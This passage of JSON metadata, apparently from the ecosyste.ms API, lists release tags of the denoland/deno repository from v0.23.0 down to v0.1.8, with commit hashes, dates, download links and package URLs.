"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"htt